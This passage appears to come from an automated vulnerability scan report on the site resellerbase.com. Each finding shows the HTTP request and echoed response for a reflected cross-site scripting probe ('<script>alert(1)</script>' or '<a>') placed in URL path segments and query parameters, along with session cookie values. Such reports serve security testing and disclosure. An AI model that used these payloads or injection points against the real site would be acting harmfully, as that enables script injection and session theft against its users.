<p>The requested URL /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=234fbc<a>2d36973ec07 was not found on this server.</p>
...[SNIP]...

2.3712. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47ac4<script>alert(1)</script>40fbc94e125 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail47ac4<script>alert(1)</script>40fbc94e125/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail47ac4<script>alert(1)</script>40fbc94e125/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3713. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d140<script>alert(1)</script>74c3cfb5868 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/86d140<script>alert(1)</script>74c3cfb5868/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/86d140<script>alert(1)</script>74c3cfb5868/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3714. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 71782<script>alert(1)</script>cf8942b094 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes71782<script>alert(1)</script>cf8942b094/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes71782<script>alert(1)</script>cf8942b094/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3715. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0f4c<script>alert(1)</script>cf4abe4a21e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmosb0f4c<script>alert(1)</script>cf4abe4a21e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmosb0f4c<script>alert(1)</script>cf4abe4a21e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3716. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 604d3<script>alert(1)</script>6075dbec776 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/search.php604d3<script>alert(1)</script>6075dbec776?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/search.php604d3<script>alert(1)</script>6075dbec776?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3717. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cab14<a>b92b6de4ac5 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Searchcab14<a>b92b6de4ac5&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Searchcab14<a>b92b6de4ac5&opt=2 was not found on this server.</p>
...[SNIP]...

2.3718. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2b39b<a>9f8743c2d19 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/search.php?keyword=search...2b39b<a>9f8743c2d19&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/search.php?keyword=search...2b39b<a>9f8743c2d19&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3719. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 94b66<script>alert(1)</script>6ee7dbdc6d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&94b66<script>alert(1)</script>6ee7dbdc6d2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&94b66<script>alert(1)</script>6ee7dbdc6d2=1 was not found on this server.</p>
...[SNIP]...

2.3720. http://www.resellerbase.com/detail/8/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ad75e<a>7be209a0ff7 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ad75e<a>7be209a0ff7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ad75e<a>7be209a0ff7 was not found on this server.</p>
...[SNIP]...

2.3721. http://www.resellerbase.com/detail/8/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fa32<script>alert(1)</script>07d6e6d8ca8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4fa32<script>alert(1)</script>07d6e6d8ca8/8/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4fa32<script>alert(1)</script>07d6e6d8ca8/8/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3722. http://www.resellerbase.com/detail/8/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be356<script>alert(1)</script>fb6d3919e88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8be356<script>alert(1)</script>fb6d3919e88/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8be356<script>alert(1)</script>fb6d3919e88/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3723. http://www.resellerbase.com/detail/8/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7a370<script>alert(1)</script>8339186d2d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes7a370<script>alert(1)</script>8339186d2d8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes7a370<script>alert(1)</script>8339186d2d8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3724. http://www.resellerbase.com/detail/8/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c303e<script>alert(1)</script>0015c63ee34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/search.phpc303e<script>alert(1)</script>0015c63ee34?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/search.phpc303e<script>alert(1)</script>0015c63ee34?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3725. http://www.resellerbase.com/detail/8/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cf567<a>73a21530adf was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/search.php?keyword=search...&Submit3=Searchcf567<a>73a21530adf&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/search.php?keyword=search...&Submit3=Searchcf567<a>73a21530adf&opt=2 was not found on this server.</p>
...[SNIP]...

2.3726. http://www.resellerbase.com/detail/8/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2e6e2<a>8579b092af4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/search.php?keyword=search...2e6e2<a>8579b092af4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/search.php?keyword=search...2e6e2<a>8579b092af4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3727. http://www.resellerbase.com/detail/8/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 729ec<script>alert(1)</script>a3c53a9563 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2&729ec<script>alert(1)</script>a3c53a9563=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2&729ec<script>alert(1)</script>a3c53a9563=1 was not found on this server.</p>
...[SNIP]...

2.3728. http://www.resellerbase.com/detail/8/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eaa9e<a>8da13071de0 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2eaa9e<a>8da13071de0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2eaa9e<a>8da13071de0 was not found on this server.</p>
...[SNIP]...

2.3729. http://www.resellerbase.com/detail/9/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56f5a<script>alert(1)</script>7c8ec818a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail56f5a<script>alert(1)</script>7c8ec818a53/9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail56f5a<script>alert(1)</script>7c8ec818a53/9/ was not found on this server.</p>
...[SNIP]...

2.3730. http://www.resellerbase.com/detail/9/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/

Issue detail

